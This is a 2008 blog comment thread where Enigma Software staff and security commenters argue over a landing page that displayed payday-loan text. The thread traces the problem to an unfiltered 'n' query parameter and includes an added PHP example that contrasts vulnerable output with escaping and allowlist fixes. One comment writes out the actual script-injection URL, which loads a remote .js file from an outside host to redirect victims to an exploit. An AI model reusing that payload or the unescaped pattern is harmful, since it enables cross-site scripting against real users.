I have no doubt there will be more to follow… Stay tuned.














{ 22 comments }
Enigma Software Group USA, LLC 05.22.08 at 12:41 pm
You are spreading false rumors on your site
This image is a fake that was made with the sole intent to damage our reputation.
http://certifiedbug.com/blog/wp-content/enigmasoftware4.png
Enigma Software Group USA, LLC 05.22.08 at 12:45 pm
Enigma is not in the credit business and Enigma has not been spoofed, and there are false statements and images on this webpage http://certifiedbug.com/blog/2008/05/21/enigmasoftware-payday-loan/. There are images suggesting to readers of your site that our web site and servers have been compromised. And that our software is scanning for bad credit and offering pay day loans. The image suggesting that SpyHunter will scan the Entire computer to detect negative credit is a fake image. It was never on our servers.
Fake Image URL: http://certifiedbug.com/blog/wp-content/enigmasoftware4.png
As far as the URL and title referenced in the article. Our pages are dynamically generated, where you can pass parameters and the page will have the title and other keywords based on the querystring keyword or phrase passed through it. For example, in the page you are describing http://www.enigmasoftware.com/spyhunter_more_info.php?n=?n=xxxx will change the content inside the title tags xxxx. This is a common practice in most dynamically generated content on most content management systems.
Someone created an account on a china expatriate forum that made only one post with a link on this page http://www.alloexpat.com/china_expat_forum/member56188.html to a non-existent page on our server which was then dynamically generated. The page, which subsequently showed up in Google, has text relating to Payday Loans.
This whole situation then became blown out of proportion with someone under the alias of JeanInMontana making accusations that we are using data that we collect for phishing and Spam. These accusations are false and entirely baseless.
Enigma Software Group USA, LLC is not in the loan business.
certifiedbug 05.22.08 at 1:16 pm
On the contrary, this site was spammed with links to the site from which I took the screenshots yesterday.
Which is why I wondered if the site had been spoofed.
I see the exact same links now redirect to a legitimate page.
ShadowPuterDude 05.22.08 at 1:19 pm
Google is your friend
hxxp://www.google.com/search?hl=en&q=%22
Scan+your+entire+computer+to+detect+negative+credit+
-+Payday+loan&btnG=Search
Sorry, Enigma Software Group USA, LLC; but the fact is your page did say that until recently.
Steven 05.22.08 at 1:23 pm
Trust me, you don’t need us to damage your reputation - ESG do that all by themselves ……..
And nope, the image is NOT a fake …… many of us witnessed the same thing. All you have done, to prevent this being seen, is fix the bug in your site, that allowed script injection.
Previously, someone had attempted to redirect victims to an exploit, via your website. Since your site was not correctly filtering HTML codes, the following with Javascript disabled, displayed what is shown in the screenshot shown by CB, and with JS enabled, took the victim to the exploit;
hxxx://www.enigmasoftware.com/spyhunter_more_info.php?n=negative%20credit%20-%20Payday%20loan
%20-%20Up%20to%202500$%20Next%20day%20in%20your%20Bank
%20account%20payday%20loan%3Cscript
%20src=http://cmiia.com/o9.js%3E%3C/script%3E
Since you’ve fixed this, it now correctly leads to;
spyhunter_more_info.php
We’re not stupid Alvin ;o)
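The comments above describe a landing page that copied the `n` query-string value into its title and body without filtering HTML. As an added example (not part of any comment and not Enigma Software's code), the PHP below shows that pattern beside two corrections; only the parameter name `n` comes from the thread, while the function names, page markup, keyword list and the `example.invalid` host are hypothetical.

```php
<?php
// Added illustration; not Enigma Software's code. The parameter name "n" is
// taken from the URLs quoted in the thread; everything else is hypothetical.

// Vulnerable pattern: the raw query-string value is written into the markup.
function render_unsafe(string $n): string
{
    return "<title>$n</title>\n<h1>More information about $n</h1>";
}

// Hardened pattern: bound the length, then HTML-encode at the point of output
// so markup characters in the value are displayed as text, never parsed.
// ENT_SUBSTITUTE replaces any multibyte sequence cut in half by substr().
function render_safe(string $n): string
{
    $n = substr($n, 0, 80);
    $e = htmlspecialchars($n, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<title>$e</title>\n<h1>More information about $e</h1>";
}

// Stricter option for landing pages: accept only keywords the site publishes.
function lookup_keyword(string $n, array $known): ?string
{
    $key = strtolower(trim($n));
    return in_array($key, $known, true) ? $key : null;
}

// Constructed sample input: attacker-chosen text plus a script element
// pointing at a placeholder host (example.invalid).
$n = 'Payday loan<script src=http://example.invalid/x.js></script>';

echo render_unsafe($n), "\n\n";  // script element reaches the browser intact
echo render_safe($n), "\n\n";    // script element is shown as encoded text

$known = ['spyhunter', 'spyware removal'];   // hypothetical keyword list
$hit = lookup_keyword($n, $known);
echo $hit === null ? "404: unknown keyword\n" : "render page for $hit\n";
```

Output encoding alone stops the script element from executing but still lets a link author put arbitrary text in the title, which is the part that ended up in search results; the keyword allowlist with a 404 for everything else closes that as well.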
Alvin Estevez 05.22.08 at 2:36 pm
“Trust me, you don’t need us to damage your reputation - ESG do that all by themselves”
Steven, I remember you from other conversations, that is your opinion and irrelevant to what we are discussing. We are aware of your opinions on us. Our loyal customers do that share your opinion. I think your issue with us is almost like a personal obsession. I would advise to please let’s stick to the issues. For example, the issue of the page with the exploited querystring (n=…..) Let’s address that.
Enigma Software Group USA, LLC 05.22.08 at 2:39 pm
You are correct the page was there. It was simply what we had previously stated.
Enigma landing pages are dynamically generated, where you can pass parameters and the page will have the title and other keywords based on the querystring keyword or phrase passed through to it. For example, in the page you are describing http://www.enigmasoftware.com/spyhunter_more_info.php?n=xxxx will change the content inside the title tags xxxx. This is a common practice in most dynamically generated content on most content management systems.
Someone started spamming links on sites such as china expatriate forum (http://www.alloexpat.com/china_expat_forum/member56188.html ) to an invalid URL on our server which was then dynamically generated. The page, which subsequently showed up in Google had text relating to Payday Loans. This is not our business and never was nor are we interested in it.
certifiedbug 05.22.08 at 2:44 pm
The site I was at when I took the screenshots had a problem, (for whatever reason), it obviously appears to be corrected now.
The same spammer who posted the link originally did it again today.
Alvin Estevez 05.22.08 at 2:55 pm
ShadowPuterDude,
“Sorry, Enigma Software Group USA, LLC; but the fact is your page did say that until recently.”
The bottom-line:
As I stated before, that page had a parameter that was exploited by that forum poster who linked to the page knowing that the page will display on the title and the body whatever he or she wanted to display.
By no means was that a server level spoof. That was simply exploiting the known (n=…) querystring to manipulate the page.
We have no interest in the credit or loan business….
Anybody could have exploited that link into anything they wanted to exploit it for…. We have corrected the problem as soon as my technical team became aware that they were doing it.
Alvin Estevez 05.22.08 at 3:01 pm
Certifiedbug, we will investigate who is this forum spammer who has it in for us.. He or she will not be able to exploit that querystring anymore. We are exploring our options with our legal counsel.
certifiedbug 05.22.08 at 3:12 pm
Do you want the spammer’s IP, Alvin Estevez?
Paperghost 05.22.08 at 3:25 pm
Alvin, I have updated my blog post to say that despite the statement in the article I linked to which claims Enigma has changed its name, you have posted to confirm otherwise.
As for the above issue of the spammer and potential exploit redirection, would it not be beneficial in this case to work with Tashi with regards tracking down and shutting down the spammers if at all possible? It seems to me bringing this issue to light has actually been beneficial to yourselves in terms of both making you aware of it, and also giving you the chance to take action to shut this person down completely. Just a thought
Alvin Estevez 05.22.08 at 3:40 pm
PaperGhost,
I wanted to speak to you on the Anti-Spyware Coalition consortium meeting last January of this year.
I was sitting in the audience and enjoyed some of the work you do with the young hackers.
I am willing to work with Tashi to find those spammers.
My only issue is, the IP can be bogus, what if they are using proxies or compromised computers? But at least it is a starting point….
Alvin
Alvin Estevez 05.22.08 at 3:44 pm
Paperghost,
Is there a way for us to speak to you in private?
Alvin
Paperghost 05.22.08 at 3:59 pm
Email me at Paperghost@vitalsecurity.org is the quickest way. It’s late here, but I will wait up for your message.
ShadowPuterDude 05.22.08 at 4:16 pm
Alvin,
I am quite familiar with Content Management Systems and dynamically generated web pages.
Some person or persons have taken advantage of a vulnerability in your software and exploited it. You have since corrected the vulnerability to prevent code injection.
That doesn’t change the fact that someone from your company falsely accused certifiedbug of posting fake images and spreading false rumors. Those pages did exist, with the content displayed; as posted in the article. I’ve seen them, 4 pages, including spyhunter_more_info.php.
Be thankful that the malicious redirect, was ineffective. I’ve been to the redirect, to investigate. I won’t discuss the particulars of the attempted exploit in an open discussion that anyone, including the perpetrators, can view.
Alvin Estevez 05.22.08 at 4:37 pm
ShadowPuterDude,
Do not post it here.. But what 4 other pages are exposed? And how can we communicate privately to discuss the particulars?
Thanks,
Alvin
Alvin Estevez 05.22.08 at 4:53 pm
ShadowPuterDude,
“Some person or persons have taken advantage of a vulnerability in your software and exploited it.”
It was not my “Software” that was exploited, it was simply the page or pages to be exact.
Alvin
ShadowPuterDude 05.22.08 at 5:33 pm
Alvin,
You can contact me at spd@malwareks.com, and I’ll give you the information I have.
If you use the vulnerable code on other pages, you’ll want to review your code, and notify the author of the CMS you use of the code injection vulnerability.
ShadowPuterDude 05.22.08 at 6:47 pm
Correcting my mistyped email addy: spd@malwareteks.com
bonzo 08.11.08 at 2:29 pm
While looking for a cure for XP Antivirus 2008 I found www.wiki-security.com. Except for no search function, it’s a pretty legitimate looking AV site. The weird thing is that every page has a download link for SpyHunter. It’s like some sort of covert ad for SpyHunter. The weirder thing is that when I clicked on a link to download the “free” software it’s blocked by our AV firewall tagging it as W32.JAKUZ, a known keylogger (Kaspersky).
certifiedbug 08.11.08 at 6:46 pm
Hello bonzo,
I tested the download with two different AVs, neither alerted.
What do you mean by “our AV firewall”?
Search on W32.JAKUZ at Kaspersky.
Comments on this entry are closed.